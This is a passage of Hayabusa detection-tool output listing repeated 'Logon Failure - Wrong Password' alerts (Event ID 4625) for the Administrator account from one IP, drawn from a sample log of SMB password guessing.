NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.313 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rfMbFXQcP5sA2wmf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.349 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xu4pgyCcDjl9h0Et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B00w8dZG3sT2Lsqo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.450 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aKGq6qrchp4SLvT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XnScYHBCKOSHItsi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r8UMBM326M7a4njd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kTdYWOi6p7etRfya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JWSlcEVzj5lGtVg0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.728 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xc77wukLTPOYAzj2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w4WmTwTGuwDN6YXn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeN4cSffFA04oOje : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eYFPV1kGALqX8jyO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIlhxT4qqo5bCsU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: btoOskH0112h7MTO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:32.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nWUhQJBcS7XbMJUq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.004 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E70qmXDDWqmWJjyU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oX0L8wf6nt2grLvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0D8BwniiXsjfkYqE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSWYo4mphuvKHQHl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: im8an1mDle9f8skd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aOyLWd5CAAjnJt3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.240 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7gI55uWlshCLw3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: l7UogJ8bBw6Epbht : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qIl0QRFHXCVAHWdV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.370 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OxPv9v4TxFvS9JMy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHMGfCorrLXpDyeD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KQTKgFibIa8NWExO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.492 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEnx3upH3Om0wHn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.532 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KlNbW1ljPSTdgUKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w2WMd3HugfjSwJPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yEy0C6dMhysbNDrX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vxlayd8pnAZ3dZ2Q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PhKO1jyWqVEdC9w2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.736 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dAH2mHJ4ZK5GS2p0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.776 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lV2ZIWGGwlkyEMRB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sum2yMFio9KLwZk5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fICXSRvv9Vm0uVpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.894 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IgrOk6Fjp0QtfJ3i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OPKoHLtxNoiG65sl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:33.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NctXRH1DR3slfVxQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.012 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vLnAs36K1mTivu2w : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H7crZQ0eQ5RDNIp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.108 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yHjgGhEtZgNwjaii : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y5gi2SS2mQiDylQ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kqWJGguiWBEplJiZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RWP4luPa3lFolQVI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5K9DQWbzslRZZMSC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.329 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5qm0L113v24jlfjx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.360 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: seuUjyGmNlyYT4tU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FljAF4LWLmWNa3kL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RnN5mBOaAvYu25G7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.476 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: llBt31S46QVzg0Ki : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1rvJUZo91Kka0G1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7Zqi86ZSFGRnoFM4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GeyeVdCUmHEKxR8f : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DwxJVXt79KBZalqS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TDfRu1OTlHmyc38P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OLCAMPDWti9hjHtV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.833 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k2eViuJeorX2peGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.868 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: davOE9p1fF2LbDP7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.922 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YFQsEbZnm94eSuUl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UnNcBIPoWdJH0x7M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:34.997 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8Fw1xVFyar0Cal2J : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.040 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FWzn4Oa8PQdH9Gqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b68beIB5BKyMv8d3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:35.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HeXSJhEXzpiRX8BT : IP Address: 192.168.198.149 : AuthPackage: 